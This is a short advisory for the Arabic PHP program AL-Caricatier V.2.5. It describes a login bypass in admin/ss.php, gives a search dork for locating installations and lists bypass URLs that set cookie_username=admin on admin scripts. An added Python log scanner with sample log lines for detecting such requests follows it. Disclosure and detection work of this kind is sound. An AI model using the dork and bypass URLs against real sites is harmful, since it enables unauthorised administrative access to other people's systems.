<p>Vulnerability in AL-Caricatier V.2.5</p>
<p>Hello...<br>I found a vulnerability in a program called AL-Caricatier. It's an Arabic program.</p>
<p>site:<br><a href="http://www.php-ar.com/">http://www.php-ar.com</a></p>
<p>Vulnerability:<br>Login Bypass</p>
<p>GoogleDork:<br>inurl:view_caricatier. php</p>
<p>The vulnerability is in an included file called ss.php, which resides in the admin directory:</p>
<p>if($cookie_username){<br>echo&quot;&quot;;<br>}else{<br>echo&quot;&lt;font face='tahoma' size='2'&gt;You Didn't Sign in لم تقم بتسجيل الدخول&lt;/b&gt;&quot;;<br>echo&quot;&lt;meta http-equiv='Refresh' content='1; url=admin_login.php'&gt;&quot;;<br>EXIT;<br>}</p>
<p>The admin directory is protected by a user name and password, but you can bypass them by going to this link:</p>
<p><a href="http://www.victim.com/view_caricatier.php">www.victim.com/view_caricatier.php</a></p>
<p>To bypass:<br><a href="http://www.victim.com/admin/welcome.php?cookie_username=admin">www.victim.com/admin/welcome.php?cookie_username=admin</a><br>or use any of the other admin files instead of welcome.php, such as:<br>add-flashFile.php<br>caricatier_add.php<br>delete_cat.php</p>
<p>and you are in the admin interface.</p>
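<p>For defenders reviewing web server logs, the following added example (not part of the original advisory or of the program) flags requests that set cookie_username in the query string of a script under admin/, including encoded spellings that PHP maps to the same variable name. The combined log format, the sample lines and the function names are assumptions made for illustration.</p>

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

AUTH_VAR = "cookie_username"  # variable trusted by admin/ss.php (from the advisory)

# Common/combined log format: ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
ADMIN_SCRIPT_RE = re.compile(r"/admin/[^/]+\.php$", re.IGNORECASE)

def php_var_name(raw_key):
    """Normalise a query key the way PHP names the resulting variable:
    spaces and dots become underscores, an array suffix ([], [k]) is dropped."""
    return re.sub(r"[ .]", "_", raw_key.split("[", 1)[0])

def find_bypass_attempts(lines):
    """Return one dict per logged request that sets AUTH_VAR in the query
    string of a PHP script directly under an admin/ directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m["target"])
        path = unquote(url.path)
        if not ADMIN_SCRIPT_RE.search(path):
            continue
        # parse_qsl percent-decodes keys, so cookie%5Fusername is caught too.
        keys = {php_var_name(k) for k, _ in parse_qsl(url.query, keep_blank_values=True)}
        if AUTH_VAR in keys:
            hits.append({"ip": m["ip"], "time": m["time"], "path": path,
                         "status": int(m["status"]), "size": m["size"]})
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /view_caricatier.php?id=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /admin/welcome.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /admin/welcome.php?cookie_username=admin HTTP/1.1" 200 8042',
    '198.51.100.7 - - [01/Jan/2024:10:02:40 +0000] "GET /admin/delete_cat.php?cookie%5Fusername=x&id=4 HTTP/1.1" 200 900',
    '203.0.113.5 - - [01/Jan/2024:10:05:00 +0000] "GET /admin/caricatier_add.php?cookie_username[]=a HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

<p>Because ss.php answers unauthenticated requests with a small "not signed in" page rather than an error status, compare the logged response size of each hit against that page to judge whether the admin interface was actually served.</p>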